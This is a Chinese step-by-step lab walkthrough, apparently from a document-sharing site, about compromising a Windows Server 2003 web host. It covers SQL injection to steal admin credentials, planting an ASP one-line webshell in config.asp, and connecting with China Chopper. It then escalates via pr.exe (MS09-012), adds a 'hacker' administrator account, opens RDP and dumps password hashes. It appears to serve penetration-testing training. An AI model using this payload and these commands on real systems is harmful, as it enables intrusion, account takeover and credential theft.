通过菜刀工具获取目标主机权限.docx

通过菜刀工具获取目标主机权限.docx

《通过菜刀工具获取目标主机权限.docx》由会员分享，可在线阅读，更多相关《通过菜刀工具获取目标主机权限.docx（36页珍藏版）》请在冰豆网上搜索。

通过菜刀工具获取目标主机权限

获取webshell后，上传一句话木马，通过中国菜刀连接启动3389服务，添加管理员账户，获取目标主机的权限

获取webshell插入一句话木马的方法有很多，不一定是通过sql注入。

从中国菜刀连接上靶机后，获取服务器权限的步骤方式都一样

Setp0

实验环境

操作机：

WindowsXP[172.16.11.2]

目标机：

Windowsserver2003[172.16.12.2]

实验工具：

中国菜刀Pr御剑Pangolin3389

本实验要求获取网站的服务器权限。

Step1

目录扫描

工具：

御剑  

路径：

C:

\Tools\目录扫描\

打开御剑，在域名中输入，开始扫描；

在目录列表中查找后台，发现存在/admin

双击打开后台登录页面

不过用户名和密码都不知道，没关系，进行下一步：

获取用户名和密码。

Step2

工具：

旁注WEB综合检测程序Ver3.6修正版

路径：

C:

\Tools\注入工具\Domain3.6\Domain3.6.exe

打开工具，依次点击[SQL注入]-->[批量扫描注入点]-->[添加网址]-->[批量分析注入点]；

出现下面这个对话框说明已经检测完毕；

点击OK进行下一步；

注入点分析完毕后，会在下方列表中显示可注入的地址，选择其中一个地址，右键选择[检测注入]；

点击[检测注入]后，主界面从[批量扫描注入点]转到[SQL注入猜解检测]，点击[开始检测]；

检测完毕后，显示可以注入，并列出了数据库类型：

Access数据库；

下面开始逐步[猜解表名]-->[猜解列名]-->[猜解内容]；点击[猜解表名]后，在数据库列表中会显示4个表，分别是admin、user、movie和news；

选择admin表，点击[猜解列名]，成功猜解出三个列名id、username和password；

勾选username和password，点击[猜解内容]，右侧列表中成功显示用户名admin，密码469e80d32c0559f8

当然密码是MD5加密的，打开本机浏览器，输入，输入刚刚查询到的密文，点击[解密]；

成功找到明文密码：

admin888；

注入的方法与工具很多，或者也可以这样：

在浏览器中打开网站首页，在最新产品中随便选择一个打开[注入点太多]；

复制URL[]，使用工具：

穿山甲

工具：

[穿山甲Pangolin]   

路径：

C:

\Tools\注入工具\pangolin

Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。

所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞，从而达到获取、修改、删除数据，甚至控制数据库服务器、Web服务器的目的的测试方法；

打开穿山甲，输入URL，点击绿色三角箭头进行注入操作；

点击[Dates]切换到Dates选项卡，点击[Tables]成功猜解出4张表；

获取内容的原理同Domain的使用方法一样，[猜解表名]-->[猜解列名]-->[猜解内容]；

同样能获取用户名和密码；

下一步：

登录后台，上传木马；

Setp3

打开后台登录页面，输入用户名admin，密码admin888，输入验证码，点击[ENTER]登录后台；

久违的后台终于进去了….

点击左侧菜单栏中的[系统设置管理]-->[网站信息配置]，用修改配置文件的方法获取WebShell；

打开相应页面后，将[公司名称]内容修改为一句话木马 "%><%EvalRequest（Chr（35））%><%'

写一句话木马的时候注意闭合；

点击最下面的[保存设置]按钮；

如果插马成功，[公司名称]内容为空；

打开[中国菜刀]连接一句话木马；

工具：

中国菜刀  路径：

C:

\Tools\webshell\中国菜刀

打开菜刀，右键空白处，选择[添加]；

在地址栏中输入，为什么是这个路径？

因为我们刚才修改的网站信息配置页面，就是这个路径，可以自己下载一个魅力企业网站管理系统源码看看，2007或2009版的都行，里面的目录结构一目了然；

连接密码为#，密码为什么是#？

往上看一句话木马，里面有个chr（35），#的ascii码就是35，当然这个密码可以随便设置，只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可，点击[添加]；

添加成功后会新增一条记录；

双击这个URL，成功进入！

解释一下一句话木马

/inc/config.asp的源码是这样的：

1.<%

2.ConstSiteName="魅力企业网站管理系统2007中英繁商业正式版"      '网站名称

3.ConstEnSiteName="MSCOM2007"      '网站名称

4.ConstSiteTitle="魅力软件"      '网站标题

5.ConstEnSiteTitle="MelyySoft"      '网站标题

6.ConstSiteUrl=""      '网站地址

7.ConstMiibeian="湘ICP备号"      '网站备案号

8.….

9.%>

复制代码

构造一句话木马：

1."%><%EvalRequest（Chr（35））%><%'

复制代码

插入一句话木马后，config.asp代码会变成这样：

1.<%

2.ConstSiteName=""%><%EvalRequest（Chr（35））%><%'"      '网站名称

3.ConstEnSiteName="MSCOM2007"      '网站名称

4.ConstSiteTitle="魅力软件"      '网站标题

5.ConstEnSiteTitle="MelyySoft"      '网站标题

6.ConstSiteUrl=""      '网站地址

7.ConstMiibeian="湘ICP备号"      '网站备案号

8.….

9.%>

复制代码

代码再整理规范一点就是这样：

1.<%ConstSiteName=""%>

2.<%EvalRequest（Chr（35））%>

3.<%'"      '网站名称

4.ConstEnSiteName="MSCOM2007"      '网站名称

5.ConstSiteTitle="魅力软件"      '网站标题

6.ConstEnSiteTitle="MelyySoft"      '网站标题

7.ConstSiteUrl=""      '网站地址

8.ConstMiibeian="湘ICP备号"      '网站备案号

9.….

10.%>

复制代码

所以插入一句话木马一定要保证整个代码的语法是正确的，否则肯定不成功；

下一步，添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码；

Step4

进入C:

\RECYCLER目录，准备上传提权工具；当然可写的目录不知这一个，还有其他的； 

提权工具包括pr，3389，cmd，路径：

C:

\Tools\提权工具\windows

开始上传工具，选中这三个文件，用鼠标直接拖到中国菜刀中，即可完成上传；

上传成功；

Pr.exe提权

Windows跟踪注册表项的ACL权限提升漏洞  KB952004  MS09-012

Windows管理规范（WMI）提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程，同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。

WMI提供程序主机进程在某些情况下会持有SYSTEM令牌，如果攻击者可以以NetworkService或LocalService帐号访问计算机，攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。

一旦找到了SYSTEM令牌，就可以获得SYSTEM权限的提升。

使用方法：

1.pr.exe"netuserhacker123/add&netlocalgroupadministratorshacker/add"

复制代码

netuserhacker123/add

添加一个用户名为hacker、密码为123的账户；

netlocalgroupadministratorshacker/add  

将账户hacker添加到管理员组；

提权有很多种，如巴西烤肉Churrasco.exe等；

下一步，执行提权操作；

右键cmd.exe，选择[虚拟终端]

成功进入，将目录切换到C:

\RECYCLER

用pr.exe执行cmd命令，添加账户；

1.pr"netuserhacker123/add"

复制代码

第一次执行命令有可能不成功，怎么办？

没关系，再执行一次就OK了；

账户添加成功，下一步，将hacker账户添加到系统管理员组；

1.pr"netlocalgroupadministratorshacker/add"

复制代码

添加成功，下一步，开启3389；

1.pr3389

复制代码

如果出现如上图中的一大堆命令，说明执行成功了，不成功就多执行几次命令，下一步，连接目标机；

[开始]-->[运行]-->mstsc

如果找不见目标IP地址，请点击右上角[场景拓扑图]进行查看：

输入目标IP地址：

172.16.12.2，开始连接，继续输入用户名hacker和密码123，进入系统；

3389连接成功！

下一步，获取系统管理员密码，准确的说是获取系统管理员密码的hash，上传密码获取工具，还是使用菜刀上传；

工具一大堆，随便用，这里我们使用QuarksPwDum，开始上传；

上传成功，进入目标机，运行QuarksPwDump  

注：

打开cmd，用命令行启动QuarksPwDump，不要直接双击；

运行后，会出现如下界面：

继续输入命令：

1.QuarksPwDump--dump-hash-local

复制代码

执行后的结果如下：

成功获取到administrator的hash：

62C4700EBB05958F3832C92FC614B7D1:

4D478675344541AACCF6CF33E1DD9D85

暂时切换出实验环境，在你的电脑上打开浏览器输入，在页面的相应位置输入hash，然后GO；

ps：

如果打不开就翻墙，或者用其他类似功能的网站也可以，这样的站点很多；

最终结果输出：

___________________________________________________________________________________________________________________________________________

WVS

WVS[WebVulnerabilityScanner]是一个自动化的Web应用程序